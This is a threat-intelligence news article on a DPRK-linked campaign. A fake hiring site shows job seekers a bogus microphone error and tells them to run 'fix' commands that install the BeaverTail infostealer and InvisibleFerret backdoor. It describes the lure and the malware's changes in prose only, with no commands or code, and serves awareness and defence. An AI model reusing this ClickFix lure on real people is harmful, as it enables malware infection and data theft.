In a recent cybersecurity development, threat actors affiliated with the Democratic People’s Republic of Korea (DPRK) have been identified utilizing the ClickFix social engineering technique to disseminate the BeaverTail malware. This campaign specifically targets individuals seeking employment in the cryptocurrency and retail sectors, focusing on roles such as marketing and trading.
The ClickFix method involves deceiving users into executing malicious commands under the guise of resolving non-existent technical issues. In this instance, the attackers lure job seekers to a counterfeit hiring platform, prompting them to complete a video assessment. During this process, a fabricated error message appears, alleging a microphone malfunction. Victims are then instructed to run operating system-specific commands to fix the issue, which, in reality, initiates the deployment of a streamlined version of the BeaverTail malware.
BeaverTail, a JavaScript-based information stealer, has been previously associated with North Korean cyber operations. It functions by extracting sensitive data from infected systems and serves as a conduit for additional payloads, such as the Python-based backdoor known as InvisibleFerret. Notably, this campaign marks a shift in targeting strategies, moving from software developers to individuals in marketing and trading positions within the cryptocurrency and retail industries.
The attackers employ a fake hiring platform hosted on Vercel to distribute the malware. This platform advertises positions at various Web3 organizations and encourages targets to invest in a Web3 company. Upon visiting the site, users’ public IP addresses are recorded, and they are prompted to complete a video assessment. At this juncture, the fabricated microphone error is presented, leading victims to execute commands that result in the installation of the BeaverTail malware.
This iteration of BeaverTail exhibits a simplified information-stealing routine, targeting fewer browser extensions—specifically eight, compared to the 22 targeted in previous versions. Additionally, functions related to extracting data from web browsers other than Google Chrome have been omitted. The Windows variant of BeaverTail utilizes a password-protected archive to load Python dependencies associated with InvisibleFerret, indicating an evolution in the attackers’ methodologies.
The use of password-protected archives for payload delivery is a technique that has been observed among various threat actors. However, this marks the first instance of its application in conjunction with BeaverTail, suggesting that the DPRK-affiliated hackers are continually refining their attack strategies to enhance effectiveness and evade detection.
This campaign underscores the persistent and evolving threat posed by state-sponsored cyber actors targeting the cryptocurrency sector. It highlights the importance of vigilance among job seekers and organizations in the industry, emphasizing the need for robust cybersecurity measures and awareness to mitigate such sophisticated social engineering attacks.
